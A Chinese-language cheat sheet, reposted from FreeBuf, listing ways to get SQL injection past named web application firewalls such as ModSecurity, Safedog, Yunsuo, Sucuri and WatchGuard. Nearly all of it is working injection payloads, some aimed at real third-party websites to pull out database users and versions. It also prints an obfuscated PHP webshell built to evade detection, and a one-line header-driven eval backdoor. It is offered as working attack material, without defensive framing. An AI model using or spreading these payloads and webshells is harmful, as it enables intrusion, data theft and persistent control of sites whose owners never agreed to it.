常见WAF绕过
转载于:https://www.freebuf.com/column/228763.html
PHPIDS
0.6.1.1默认规则 :
拒绝:/?id=1+union+select+user,password+from+mysql.user+where+user=1
允许:/?id=1+union+select+user,password+from+mysql.user+limit+0,1
拒绝: /?id=1+OR+1=1
允许: /?id=1+OR+0×50=0×50
拒绝:/?id=substring((1),1,1)
允许: /?id=mid((1),1,1)
Mod_Security
2.5.9默认规则:
拒绝: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
允许: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
拒绝: /?id=1+OR+1=1
允许: /?id=1+OR+0×50=0×50
拒绝: /?id=1+and+5=6
允许: /?id=1+and+5!=6
拒绝: /?id=1;drop members
允许:/?id=1;delete members
/?id=(1);exec(‘sel’+’ect(1)’+’,(xxx)from’+’yyy’)
Modsecurity WAF Bypass vectors
–new version–
id=@:=(– a %0a select 123 from {ftable})|0.1union– a %0a select+1,@,3
id=@:=(– a %0a select 123 from {ftable}).9union/!%0aselect 1,@,3*/
id=@:=(%23 a %0a select 123 from {ftable})-\Nunion%23 a %0a select+1,@,3
id=@:=(%23 a %0a select 123 from((table)))/1e0union%23 a %0a select+1,@,3
id=@:=(%23 a %0a select 123 from((table)))/1e0union%a0(select 1,@,3)
–old version–
id=1-.0union distinctrow select 1,2,3from {f table}
id=-1 /!50000union/ select 1,2,.3fromtable
id=-1e0union distinct select 1,2,3e0fromtable
id=\Nunion (select 1,2,\Nfrom table)
id=.1union distinct select sql_cache1,2,3 from table
安全狗
/|–|/代替空格
/.../ 代替空格。
%1f 绕过空格
/*/#*/ 代替空格。
/// 替换空格
http://www.safedog.cn/?id=/*’unionselect 1,2 from users%23*/
http://www.safedog.cn/?id=’ — ‘ unionselect 1,2 from users%23
http://www.safedog.cn/?id=%20/*%27%20union%20select%20%27*/%27,2%20from%20users%23
/!50001and/
/!50001union/
/!50003select/
/!50001from/ 数字不以0结尾
/!union/!*/
/!select/!*/
过狗SHELL
’type’,'abvgpahs_rgnrep’=>’crfu’);$config =array_flip($config); $de =function(&$value){$value=strrev(str_rot13($value));};array_walk($config,$de); @$config['recv'] =isset($_POST[$id])?$_POST[$id]:$_GET[$id]; $fun = function() use ($config){return$config['crfu'](‘$pa’, “{$config['type']}”.’($pa);’);}; $have = $fun();$have($config['recv']); ?>xx=assert&oo=phpinfo()
php eval(gzuncompress(base64_decode(getallheaders()['xx']))) **云锁** 1.php?id=-1 union(select1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17) (union与select 中间加个“(”) 2.将空格替换成/*/*/ 3.?id=/*’ union select 1,2 from users%23*/ (把SQL语句写在 /*’ */ 里面) http://www.yunsuo.com.cn/?id=/*’ unionselect ‘*/’,2 from users%23 http://www.yunsuo.com.cn/?id=/*%27%20union%20select%20%27*/%27,2%20from%20users%23 **Sucuri** 最新版sucuri waf绕过 index.php?id=\NUNION(SElecT-1,current_user,3,4,5,6,7,8,9,10,11)— http://www.uaebf.ae/Press-Release.php?id=189%20and%20@x%20:%3dconcat_ws%280×20%2c%30x6279207a6875746f756767,0x3c62723e,0x56657273696f6e203a3a20,@@global%2eversion,0x3c62723e,0x55736572203a3a20,current_user%29%20having%20.0UnIOn–%20-%0aSeLe%43t~1%2c@%78,~3,~4,~5,~6,~7,~8,~9,~10,%30×27–%20- http://www.uaebf.ae/Press-Release.php?id=189-length(user()) http://www.uaebf.ae/Press-Release.php?id=189-casewhen user(+) like’uaebf_DuB6Fuser7@localhost’ then 1 else 2 end http://www.uaebf.ae/Press-Release.php?id=189-casewhen right(user(+),1) like ‘t’ then 1 else 2 end **WatchGuard** watchguard WAF绕过 http://aquatlantis.asia/index.php?id=308&tbl=registoshaving0/*!50000union*//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//*!50000select*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,user(),73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160— **Ngx_lua_waf** http://192.168.8.147/test/sql.aspx?id=1UNION/*&ID=*/SELECT null,name,null/*&Id=*/FROM master.dbo.sysdatabases **libinjection** http://test.com/sqli.mysql.php?id=1union select !<1,database() from tables **D****盾** http://192.168.8.161/sql.aspx?id=1【Fuzz位置】union selectnull,null,SYSTEM_USER http://192.168.8.161/sql.aspx?id=1.eunionselect null,null,SYSTEM_USER 结合IIS获取参数位置顺序:GET,POST,COOKIE
